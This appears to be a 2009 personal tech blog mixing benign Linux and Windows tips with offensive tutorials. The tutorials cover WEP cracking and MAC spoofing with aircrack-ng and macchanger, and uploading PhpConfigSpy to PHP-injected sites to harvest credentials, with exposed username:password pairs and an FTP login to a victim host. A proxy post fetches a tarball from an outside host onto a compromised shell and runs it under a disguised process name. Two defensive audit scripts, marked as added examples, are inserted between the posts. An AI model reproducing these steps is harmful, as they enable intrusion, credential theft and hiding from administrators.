28 May 2009

Linux Wireless Hacking

This information about wireless hacking on Linux is intended for learning purposes only. It is not to be used to commit crimes or break the law. If you do so, it is outside the responsibility of the author of this article, and you will have to face law enforcement on your own.

There are three (3) technical objectives explained here:
- Breaking WEP
- Bypassing a MAC filter
- Revealing a hidden SSID

Assumptions
- The wireless chipset used is Intel, such as ipw2200. If you are lucky enough to have an Atheros chipset, you can do far more powerful things.


Applications to prepare.
Some of the software packages required:

# apt-get install gcc g++ linux-kernel-headers libpcap0.8 libpcap0.8-dev \
libnet1 libnet1-dev libdnet libdnet-dev subversion python2.4 \
python2.4-dev python-pyx python-crypto python-psyco dhcp3-server \
bind9 apache2

Install several applications that are more focused on wireless hacking

# apt-get install kismet scapy macchanger ettercap dsniff aircrack-ng

Scanning for Hotspots
Scanning for hotspots can be done in text mode.

iwlist
The simplest way is to use the command

# iwlist scanning

Kismet
A more involved way is to use Kismet

# apt-get install kismet
# vi /etc/kismet/kismet.conf
source=none,none,addme --> source=ipw3945,wlan0,ipwsource
source=none,none,addme --> source=zd1211,eth1,zysource
source=none,none,addme --> source=ipw2200,eth1,ipwsource

Read http://www.kismetwireless.net/documentation.shtml to see the sources Kismet recognizes

# kismet

airodump
Disable monitor mode on WLAN interface eth1

# airmon-ng stop eth1

Enable monitor mode on WLAN interface eth1

# airmon-ng start eth1

Scan through WLAN interface eth1

# airodump-ng eth1

Cracking WEP using airodump and aircrack
The part that causes quite a headache is the technique for cracking WEP. The following technique requires a very large volume of packet traffic; it is usually easy when someone is transferring files on the hotspot network. If there is no traffic at all, the WEP key will remain hard to crack no matter how long you wait.
We need to note three (3) things:

(1) BSSID / MAC address of the AP
(2) MAC address of our WLAN
(3) Channel used by the AP.

For example,

BSSID 00:30:4F:4E:2B:50
WIFI 00:11:6b:33:d3:90
CHANNEL 2

To make the operation easier, it is a good idea to run

# export AP=00:30:4F:4E:2B:50
# export WIFI=00:11:6b:33:d3:90
# export CHANNEL=2

Run airodump on WLAN eth1

# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1

Run aircrack to crack the WEP key

# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs

You will need a lot of IVs, so make sure traffic is high enough. This is easy when someone is transferring files on the hotspot network.

Bypassing MAC Address Restrictions
Some APs filter client MAC addresses. The technique for finding a client MAC address that the AP allows, using Kismet, is

# kismet

Press space

S - to sort
S - to sort by SSID
Down arrow - move to the SSID of the AP we want.
ENTER - AP details
C - see which clients, and their MAC addresses, are on that AP

Make sure airmon is not active on WLAN eth1

# airmon-ng stop eth1

To change the MAC address of the WLAN on eth1 to match the MAC address of a client the AP allows

# ifconfig eth1 down
# ifconfig eth1 hw ether 00:16:CF:C1:FA:F5
# ifconfig eth1 up

Another alternative

# ifconfig eth1 down
# macchanger --mac 00:16:CF:C1:FA:F5 eth1
# ifconfig eth1 up

or for a random MAC address

# macchanger -r eth1

Finding a Hidden SSID
The most effective way to find a hidden SSID is to use Kismet

# kismet

A hidden SSID will be shown in blue and enclosed in <>.

Written by: Onno W. Purbo, X-code Magazine


14 May 2009

Download video on youtube with Linux

With Linux you can easily download videos from YouTube.
I have two ways to download YouTube videos on Ubuntu.


First (without a tool)

After you finish watching a video on YouTube in your browser (Mozilla or Opera), you can find the video file with this method.
Go to your home directory and press Ctrl+H; you will then see hidden files and directories.

If you use Mozilla, go to the directory .mozilla/firefox/0y3ysrwn.default/Cache and find the video

If you use Opera, go to the directory .opera/cache4 and find the video



Second (with slimrat)

Slimrat is a Perl tool; before using slimrat you must make sure these Perl modules are installed.

$ sudo apt-get install libwww-mechanize-perl libgtk2-gladexml-perl

Then download slimrat from http://slimrat.googlecode.com/files/slimrat-0.9.4.tar.bz2

$ wget http://slimrat.googlecode.com/files/slimrat-0.9.4.tar.bz2

Extract slimrat-0.9.4.tar.bz2

$ tar -jxvf slimrat-0.9.4.tar.bz2

Go to the directory slimrat-0.9.4

$ cd slimrat-0.9.4

Now you can easily download a YouTube video with the command

$ ./slimrat http://www.youtube.com/watch?v=blablabla


Enjoy!!



Stopping a Process from the DOS prompt

Often we use Task Manager to stop/kill a process on the Windows operating system.
Besides that, you can use the DOS prompt to stop/kill a process on Windows. Here is how to do it.

1. Open the DOS prompt: go to Start menu -> Run and then type ‘cmd’
2. Type “tasklist” without quotes and press Enter; the list of running processes will appear as below

3. Choose the application that you want to stop/kill and then find the PID number of that application
4. Type “tskill <PID>” to kill the process


Multiple Login Yahoo! Messenger

Yahoo Messenger (YM) is one of the most used chat clients. Besides YM, people may use MSN, ICQ, Skype, etc. Here I will give a short tutorial on how to log in to more than one YM account on one computer on Windows (just for Yahoo! Messenger).
Let’s begin


1. Run the registry editor: Start Menu -> Run, then type regedit and press Enter.
2. Find this key in the left pane of the registry editor: HKEY_CURRENT_USER\Software\Yahoo\Pager\Test
3. In the right panel, right-click and choose New - DWORD Value
4. Type Plural
5. Double-click Plural and set it to 1

That’s all :D. You can sign in with 2 Yahoo accounts on 1 computer.




PhpConfigSpy v0.2 - Scan and Grab Login

PhpConfigSpy is a tool that is great for getting accounts on a website, such as cPanel login, SSH login (if the web target supports SSH) and maybe database login.
Most of us, after getting a web target (via PHP injection), use that web host only for bots (EGGDROP, PSYBNC). Why not try to get full access to the web target?
Let’s try to get some login information from the web target with the PhpConfigSpy tool.


Upload PhpConfigSpy.txt to the web target, and after that rename the file from .txt to .php. That’s all. You can test the tool using a browser (IE, Firefox, Opera, etc.). For example http://www.yourtarget.com/portal/images/phpconfigspy.php.
And this is the result of the scan:
[+] Founded 113 entrys in /etc/passwd
[+] Founded 113 readable public_html directories
[~] Searching for passwords in config.* files…

[+] /home/cofinca/public_html/portal/mambots/editors/fckeditor/editor/filemanager/connectors/php/config.php
ew database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix, $mosConfig
[+] /home/bsidenet/public_html/configuration.php
bside123
[FTP] bsidenet:bside123 Success
[+] /home/gratis/public_html/configuration.php
deko93tg
[FTP] gratis:deko93tg Success

Bingo… That is a success!
You can check that username via FTP or SSH (if the target supports SSH).
Let’s check this login together:
[FTP] bsidenet:bside123 Success
That means user: bsidenet and password: bside123

C:\Documents and Settings\0286061961>ftp alvoaxxxx.pt
Connected to alvoaxxxx.pt.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 04:02. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (alvoaxxxx.pt:(none)): bsidenet
331 User bsidenet OK. Password required
Password:
230-User bsidenet has group access to: bsidenet
230 OK. Current restricted directory is /
ftp> dir
200 PORT command successful
150 Connecting to port 41080
drwx--x--x 8 32137 bsidenet 4096 Mar 26 23:06 .
drwx--x--x 8 32137 bsidenet 4096 Mar 26 23:06 ..
-rw-r--r-- 1 32137 bsidenet 24 Mar 26 23:04 .bash_logout
-rw-r--r-- 1 32137 bsidenet 191 Mar 26 23:04 .bash_profile
-rw-r--r-- 1 32137 bsidenet 124 Mar 26 23:04 .bashrc
-rw-r--r-- 1 32137 bsidenet 19 Mar 26 23:04 .contactemail
drwx------ 2 32137 bsidenet 4096 Apr 23 00:22 .cpanel-datastore
-rw------- 1 32137 bsidenet 14 Apr 23 16:06 .lastlogin
drwxr-xr-x 2 32137 bsidenet 4096 Mar 26 23:04 etc
drwxr-x--- 5 32137 12 4096 Mar 26 23:04 mail
drwxr-xr-x 3 32137 bsidenet 4096 Feb 12 2007 public_ftp
drwxr-x--- 6 32137 99 4096 Apr 23 17:43 public_html
drwxr-xr-x 7 32137 bsidenet 4096 Mar 26 23:22 tmp
lrwxrwxrwx 1 32137 bsidenet 11 Mar 26 23:04 www -> public_html
226-Options: -a -l
226 14 matches total
ftp: 936 bytes received in 0.00Seconds 936000.00Kbytes/sec.
ftp>

It works.
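
A defender-side check for the exposure this scan relies on, as an added example that is not part of the original post or of PhpConfigSpy: it lists CMS config files under each account's public_html that the group or other class can read. The function name `audit_configs`, the demo accounts and the file contents are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post).
# audit_configs <root>
# Prints "<octal-mode> <owner> <path>" for every config.* / configuration.php
# under <root>/*/public_html that grants read to group or other. Where PHP
# runs as one shared web-server user, that is enough for another tenant's
# script to read the stored passwords.
audit_configs() {
    root=$1
    find "$root" -path '*/public_html/*' -type f \
        \( -name 'config.*' -o -name 'configuration.php' \) \
        \( -perm -004 -o -perm -040 \) \
        -exec stat -c '%a %U %n' {} + 2>/dev/null | sort -k3
}

# Constructed sample tree standing in for /home on a shared host.
demo_root=$(mktemp -d)
mkdir -p "$demo_root/alice/public_html" \
         "$demo_root/bob/public_html/portal" \
         "$demo_root/carol/public_html/shop"
for f in alice/public_html/configuration.php \
         alice/public_html/index.php \
         bob/public_html/portal/config.php \
         carol/public_html/shop/config.php; do
    printf '<?php $password = "constructed-sample"; ?>\n' > "$demo_root/$f"
done
chmod 644 "$demo_root/alice/public_html/configuration.php"   # flagged: other can read
chmod 644 "$demo_root/alice/public_html/index.php"           # ignored: not a config file
chmod 600 "$demo_root/bob/public_html/portal/config.php"     # ok: owner only
chmod 640 "$demo_root/carol/public_html/shop/config.php"     # flagged: group can read

audit_configs "$demo_root"
```

On a real host run `audit_configs /home` as root. Mode 600 on these files only works where PHP runs under the account's own UID (for example suEXEC or per-user PHP-FPM pools).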




Install proxy

Do you have an SSH shell or an injected shell on a target, and don’t know what to do with that shell?
I will try to help you make a proxy using that SSH shell. First, get the source, proxy.tgz.
If you are using an injected shell, you must find a directory that has permission 777 (drwxrwxrwx) with this command “find / -type d -perm 777”.
Follow the steps below to build the proxy:


[root@vps ~]# wget http://geocities.com/databyroe/byroe/proxy.tgz
--01:30:35-- http://geocities.com/databyroe/byroe/proxy.tgz
Resolving geocities.com... 98.137.46.72
Connecting to geocities.com|98.137.46.72|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 54004 (53K) [application/x-compressed]
Saving to: `proxy.tgz'

100%[=======================================>] 54,004 --.-K/s in 0.04s

01:30:35 (1.21 MB/s) - `proxy.tgz' saved [54004/54004]

[root@vps ~]# tar -zxvf proxy.tgz
pro/
pro/xh
pro/prox

[root@vps ~]# cd pro
[root@vps pro]# ls -lrt
total 152
-rwxr--r-- 1 33 33 21516 Jun 8 2006 xh
-rwxr-xr-x 1 33 33 124828 Jun 8 2006 prox
[root@vps pro]# ./xh -s ./httpd ./prox -a -d -p2020
==> Fakename: ./httpd PidNum: 20132

The proxy is now set up and ready to use. Use the IP of the SSH shell and port 2020.
The proxy runs under the fake name ./httpd to hide it from the real administrator.
If you want to kill the proxy, you can kill it by PidNum (20132) using this command “kill -9 20132”.
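
How an administrator can spot a process hidden this way, as an added example that is not part of the original post: the renamed process still has /proc/<pid>/exe pointing at the real binary, so comparing it with argv[0] exposes the mismatch. The function name `find_renamed_procs` and the sample process tree (including the path /root/pro/prox) are constructed; only PID 20132 and the names ./httpd and prox come from the session above.

```shell
#!/bin/sh
# Added example (not from the original post).
# find_renamed_procs [procroot]
# Heuristic: report processes whose argv[0] basename differs from the basename
# of the binary that <procroot>/<pid>/exe links to.
# Prints "<pid> argv0=<argv0> exe=<path>" per mismatch. Default procroot: /proc
find_renamed_procs() {
    procroot=${1:-/proc}
    for d in "$procroot"/[0-9]*; do
        [ -r "$d/cmdline" ] || continue
        exe=$(readlink "$d/exe" 2>/dev/null) || continue   # unreadable or kernel thread
        argv0=$(tr '\0' '\n' < "$d/cmdline" | head -n 1)   # first NUL-separated field
        [ -n "$argv0" ] || continue
        exe=${exe% (deleted)}      # binary removed from disk after start
        a=${argv0%% *}             # daemons rewrite argv[0], e.g. "sshd: user@pts/0"
        a=${a##*/}                 # basename
        a=${a#-}                   # login shells appear as "-bash"
        a=${a%:}
        [ "$a" = "${exe##*/}" ] || \
            printf '%s argv0=%s exe=%s\n' "${d##*/}" "$argv0" "$exe"
    done
}

# Constructed stand-in for /proc: one renamed process, one honest daemon.
demo_proc=$(mktemp -d)
mkdir "$demo_proc/20132" "$demo_proc/812"
ln -s /root/pro/prox "$demo_proc/20132/exe"
printf './httpd\0-a\0-d\0-p2020\0' > "$demo_proc/20132/cmdline"
ln -s /usr/sbin/sshd "$demo_proc/812/exe"
printf '/usr/sbin/sshd\0-D\0' > "$demo_proc/812/cmdline"

find_renamed_procs "$demo_proc"
```

Run it with no argument as root to scan the live /proc. Interpreters, multi-call binaries such as busybox and symlinked binaries also mismatch, so treat hits as leads and check them against listening sockets (`ss -ltnp`).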




05 May 2009

Ubuntu Hardy Heron - Installing OpenOffice 3.0.1

In short, the reason I had to install OpenOffice 3 on Ubuntu Hardy Heron is that OpenOffice 2 cannot read Microsoft Office 2007 files such as docx, and several bugs in OpenOffice 2 have been fixed in OpenOffice 3.

Let's get straight to it,

First, uninstall OpenOffice 2


$ sudo apt-get --purge autoremove openoffice.org-core

Delete the .openoffice folder in the home directory

$ sudo rm -rf /home/user/.openoffice.org

Download the OpenOffice 3 file

$ wget http://kambing.ui.edu/openoffice/stable/3.0.1/OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz

Once that is done, extract it

$ tar -zxvf OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz

Enter the directory produced by the extraction

$ cd OOO300_m15_native_packed-1_en-US.9379/DEBS

Install

$ sudo dpkg -i *.deb
$ cd desktop-integration/
$ sudo dpkg -i *.deb

Done!!!
OpenOffice 3.0.1 is now installed on Ubuntu Hardy Heron.




Gyach on Ubuntu Jaunty with the Linux Mint repository

Installing gyach on Ubuntu Jaunty is easier using the Linux Mint repository.
Go to System/Administration/Software Sources, and on the Third-Party Software tab
click Add, then enter the following as the APT line
deb http://packages.linuxmint.com felicia main upstream import community



Go to terminal!!

$ sudo apt-get update
$ sudo apt-cache search gyach
gyachi - A Linux client for the Yahoo! Messenger protocol written using GTK+ GUI toolkit

$ sudo apt-get install gyachi





Ubuntu on a PANASONIC CF-W4 Laptop

This time I tried installing Ubuntu 9.04, also known as Jaunty, on a PANASONIC CF-W4 laptop.

The installation went normally without problems.
All drivers were detected, but the hotkeys for volume (fn+f6/f5), contrast (fn+f1/f2), mute (fn+f4), and so on turned out not to work.

After some browsing and reading, I finally found the solution :D

First, install git-core

$ sudo aptitude install git-core

then check out the module

$ git clone git://git.myrix.net/pana_acpi

compile and install

$ cd pana_acpi
$ make
$ make install

then run cp to copy the files

$ sudo cp pana_acpi/acpi/* /etc/acpi

restart the acpid daemon

$ sudo /etc/init.d/acpid restart

run

modprobe panasonic-laptop

the hotkeys now work :)

To load the module at boot, add "modprobe panasonic-laptop" to the file /etc/rc.local




powered by irvian